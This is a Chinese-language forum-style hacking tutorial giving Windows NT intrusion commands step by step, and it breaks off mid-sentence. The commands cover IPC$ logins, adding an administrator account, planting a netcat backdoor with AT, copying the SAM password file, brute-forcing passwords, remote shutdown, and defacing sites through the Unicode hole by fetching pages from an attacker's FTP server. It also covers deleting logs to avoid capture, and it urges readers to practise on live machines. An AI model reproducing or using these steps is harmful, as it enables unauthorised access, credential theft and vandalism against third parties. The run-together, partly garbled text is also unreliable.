入侵電腦的50種方法

如何進(jìn)入別人的電腦--大學(xué)時(shí)在參加ACCP的電腦編程課程，只是興趣而已，并沒(méi)有多么的用心學(xué)，對(duì)一些亂七八糟的東西比較感興趣，那時(shí)做的最多的就是嘗試進(jìn)入別人的電腦和服務(wù)器........取得對(duì)方IP地址如XX.XX.XX.XX，方法太多不細(xì)講了。判斷對(duì)方上網(wǎng)的地點(diǎn)，開(kāi)個(gè)DOS窗口鍵入TRACERTXX.XX.XX.XX第4和第5行反映的信息既是對(duì)方的上網(wǎng)地點(diǎn)。得到對(duì)方電腦的名稱(chēng)，開(kāi)個(gè)DOS窗口鍵入NBTSTAT-AXX.XX.XX.XX第一行是對(duì)方電腦名稱(chēng)第二行是對(duì)方電腦所在工作組第三行是對(duì)方電腦的說(shuō)明在Windows目錄下有一文件名為L(zhǎng)MHOSTS.SAM，將其改名為L(zhǎng)MHOSTS，刪除其內(nèi)容，將對(duì)方的IP及電腦名按以下格式寫(xiě)入文件：XX.XX.XX.XX電腦名開(kāi)DOS窗口鍵入NBTSTAT-R6.在開(kāi)始-查找-電腦中輸入對(duì)方電腦名，出現(xiàn)對(duì)方電腦點(diǎn)擊即可進(jìn)入黑客命令之1：NET只要你擁有某IP的用戶名和密碼，那就用IPC$做連接吧！這里我們假如你得到的用戶是hbx，密碼是123456。假設(shè)對(duì)方IP為netuse[url=file://\\\ipc$]\\\ipc$[/url]"123456"/user:"hbx"退出的命令是netuse[url=file://\\\ipc$]\\\ipc$[/url]/delte下面的*作你必須登陸后才可以用.登陸的方法就在上面.下面我們講怎么創(chuàng)建一個(gè)用戶，由于SA的權(quán)限相當(dāng)于系統(tǒng)的超級(jí)用戶.我們加一個(gè)heibai的用戶密碼為lovechinanetuserheibailovechina/add只要顯示命令成功，那么我們可以把他加入Administrator組了.netlocalgroupAdministratorsheibai/add—這里是講映射對(duì)方的C盤(pán)，當(dāng)然其他盤(pán)也可以，只要存在就行了.我們這里把對(duì)方的C盤(pán)映射到本地的Z盤(pán).netusez:\\\c$netstarttelnet這樣可以打開(kāi)對(duì)方的TELNET服務(wù).—這里是將Guest用戶激活，guest是NT的默認(rèn)用戶，而且無(wú)法刪除呢？不知道是否這樣，我的2000就是刪除不了它。netuserguest/active:yes—這里是把一個(gè)用戶的密碼改掉，我們把guest的密碼改為lovechina，其他用戶也可以的。只要有權(quán)限就行了呀！netuserguestlovechina黑客命令之2:at一般一個(gè)入侵者入侵后都會(huì)留下后門(mén)，也就是種木馬了，你把木馬傳了上去，怎么啟動(dòng)他呢?那么需要用AT命令，這里假設(shè)你已經(jīng)登陸了那個(gè)服務(wù)器。你首先要得到對(duì)方的時(shí)間，nettime[url=file://\\]\\[/url]將會(huì)返回一個(gè)時(shí)間，這里假設(shè)時(shí)間為12:1,現(xiàn)在需要新建一個(gè)作業(yè)，其ID=1at[url=file://\\]\\[/url]12:3nc.exe這里假設(shè)了一個(gè)木馬，名為NC.EXE,這個(gè)東西要在對(duì)方服務(wù)器上.這里介紹一下NC,NC是NETCAT的簡(jiǎn)稱(chēng)，為了方便輸入，一般會(huì)被改名.它是一個(gè)TELNET服務(wù),端口為99.等到了12:3就可以連接到對(duì)方的99端口.這樣就給對(duì)方種下了木馬.黑客命令之3:telnet這個(gè)命令非常實(shí)用,它可以與遠(yuǎn)方做連接，不過(guò)正常下需要密碼、用戶,不過(guò)你給對(duì)方種了木馬，直接連到這個(gè)木馬打開(kāi)的端口.telnet99這樣就可以連到對(duì)方的99端口.那你就可以在對(duì)方運(yùn)行命令了,這個(gè)也就是肉雞.黑客命令之4:FTP它可以將你的東西傳到對(duì)方機(jī)子上，你可以去申請(qǐng)個(gè)支持FTP上傳的空間,國(guó)內(nèi)多的是，如果真的找不到,我給個(gè)http://WWW.51.NET,不錯(cuò)的.當(dāng)我們申請(qǐng)完后，它會(huì)給用戶名，密碼，以及FTP服務(wù)器在上傳前需要登陸先，這里我們假設(shè)FTP服務(wù)器是H,ftp://WWW.51.NET用戶名是HUCJS,密碼是654321ftp/他會(huì)要求輸入用戶,成功后會(huì)要求輸入密碼.下面先說(shuō)上傳，假設(shè)你需上傳的文件是INDEX.HTM，它位于。:\下，傳到對(duì)方D:\getc:\index.htmd:\假設(shè)你要把對(duì)方C盤(pán)下的INDEX.HTM,下到你的機(jī)子的D盤(pán)下putc:\index.htmd:\黑客命令之5:copy下面我說(shuō)說(shuō)怎樣把本地的文件復(fù)制到對(duì)方硬盤(pán)上去，需要建立好IPC$連接才有效。這里我們把本地C盤(pán)下的index.htm復(fù)制到的C盤(pán)下copyindex.htm[url=file://\\\c$\index.htm]\\\c$\index.htm[/url]—如果你要復(fù)制到D盤(pán)下把C改為D，就行了！copyindex.htm[url=file://\\\d$\index.htm]\\\d$\index.htm[/url]—如果你要把他復(fù)制到WINNT目錄里就要把輸入copyindex.htm[url=file://\\\admin$\index.htm]\\\admin$\index.htm[/url]admin$^winnt要把對(duì)方的文件復(fù)制過(guò)來(lái)，順便告訴大家NT的備份的數(shù)據(jù)庫(kù)放在x:\winnt\repair\sam._sam._是數(shù)據(jù)庫(kù)的文件名下面就把的數(shù)據(jù)庫(kù)復(fù)制到本地C盤(pán)下copy[url=file://\\\admin$\repair\sam]\\\admin$\repair\sam[/url]._c:\黑客命令之7：nbtstat如果你掃到一部NT的機(jī)子，他的136到139其中一個(gè)端口開(kāi)了的話，就要用這個(gè)命令得到用戶了。順便告訴大家這是netbios，得到用戶名后就可以猜猜密碼了。例如比較簡(jiǎn)單的密碼，密碼和用戶名一樣的，都試下，不行就暴力破解吧！現(xiàn)在網(wǎng)上很多NT的機(jī)子都開(kāi)了這些端口的，你可以練習(xí)下，我們來(lái)分析得到的結(jié)果。命令是nbtstat-AXX.XX.XX.XX-A一定要大寫(xiě)。下面是得到的結(jié)果。NetBIOSRemoteMachineNameTableName無(wú)效StatusRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredRegisteredMACAddress=00-E0-29-14-35-BAPENTIUMIIUNIQUEPENTIUMIIUNIQUEORAHOTOWNGROUPORAHOTOWNGROUPORAHOTOWNUNIQUEPENTIUMIIUNIQUEINet~ServicesGROUPIS?PENTIUMII...UNIQUEORAHOTOWNGROUPORAHOTOWNUNIQUE..__MSBROWSE__.GROUP粉紅色的就是登陸過(guò)這部系統(tǒng)的用戶，可能你不知道怎么看，大家是不是看到了一竄數(shù)字，只要這竄數(shù)字是的話，那他前面的就是用戶。這里的用戶是PENTIUMIIo黑客命令之8：Shutdown關(guān)了對(duì)方的NT服務(wù)器的命令Shutdown[url=file://\\IP]\\IP[/url]地址t:2020秒后將NT自動(dòng)關(guān)閉，三思后才能運(yùn)行這個(gè)命令，這樣對(duì)對(duì)方造很大的損失，要做個(gè)有良心的入侵者呀。黑客命令之10：echo著名的漏洞Unicode，這個(gè)命令可以簡(jiǎn)單的黑一下有這個(gè)漏洞的主機(jī)。我們假設(shè)我們要把“南京大屠殺鐵證如山，任何日本人不得抵賴(lài)！”寫(xiě)入index.htm，有2種方法，大家看看有什么區(qū)別。echo南京大屠殺鐵證如山，任何日本人不得抵賴(lài)！>index.htmecho南京大屠殺鐵證如山，任何日本人不得抵賴(lài)！>>index.htm第一個(gè)的意思是覆蓋index.htm原有的內(nèi)容，把“南京大屠殺鐵證如山，任何日本人不得抵賴(lài)！”寫(xiě)進(jìn)index.htm。第二個(gè)的意思是把“南京大屠殺鐵證如山，任何日本人不得抵賴(lài)！”加到index.htm里面?！?gt;>”產(chǎn)生的內(nèi)容將追加進(jìn)文件中，">”則將原文件內(nèi)容覆蓋。大家可以本地試下?？赡苣銜?huì)問(wèn)，這樣簡(jiǎn)單黑下有什么好玩的，其實(shí)他可以用來(lái)下載主頁(yè)到對(duì)方的目錄里。1、首先，我們需要申請(qǐng)一個(gè)免費(fèi)的主頁(yè)空間。2、用echo在可寫(xiě)目錄下建立如下內(nèi)容的txt文件：（以chinren服務(wù)器為例。）（你的FTP服務(wù)器，申請(qǐng)時(shí)你的空間提供商會(huì)給你的）cnhack（你申請(qǐng)時(shí)的用戶名）test（你申請(qǐng)時(shí)的密碼）getindex.htmc:\inetpub\wwwroot\index.htm（這里是把你空間上的index.htm下載到U對(duì)方的c:\inetpub\wwwroot\index.htm）bye（退出FTP對(duì)話，相當(dāng)在98下的DOS，用EXIT退出DOS）具體的做法：輸入>c:\cnhack.txt輸入echocnhack>>c:\cnhack.txt輸入echo39abs>>c:\cnhack.txt輸入echogetindex.htmc:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt最后輸入ftp-s:c:\cnhack.txt（利用ftp的-s參數(shù)，執(zhí)行文件里的內(nèi)容。）等命令完成時(shí)，文件已經(jīng)下載到你指定的文件里了。注意：取得文件后，請(qǐng)刪除cnhack.txt。（如果不刪除，很容易會(huì)給別人看到你的密碼。）記得要delc:\cnhack.txt黑客命令之11:attrib這個(gè)命令是設(shè)置文件屬性的。如果你想黑一個(gè)站，而他的主頁(yè)的文件屬性設(shè)置了只讀，那就很可憐呀，想刪除他也不行，想覆蓋他也不行。倒！不過(guò)有這個(gè)命令就別怕了。attrib-rindex.htm這個(gè)命令是把index.htm的只讀屬性去掉。如果把“-”改為"+”則是把這個(gè)文件的屬性設(shè)置為只讀attrib+rindex.htm這個(gè)命令是把index.htm的屬性設(shè)置為只讀。黑客命令之12:del當(dāng)你看到這個(gè)標(biāo)題可別倒下啊！現(xiàn)在要離開(kāi)了，要?jiǎng)h除日志，當(dāng)然要?jiǎng)h除日志啦！想被捉嗎。呵呵。NT的日志有這些de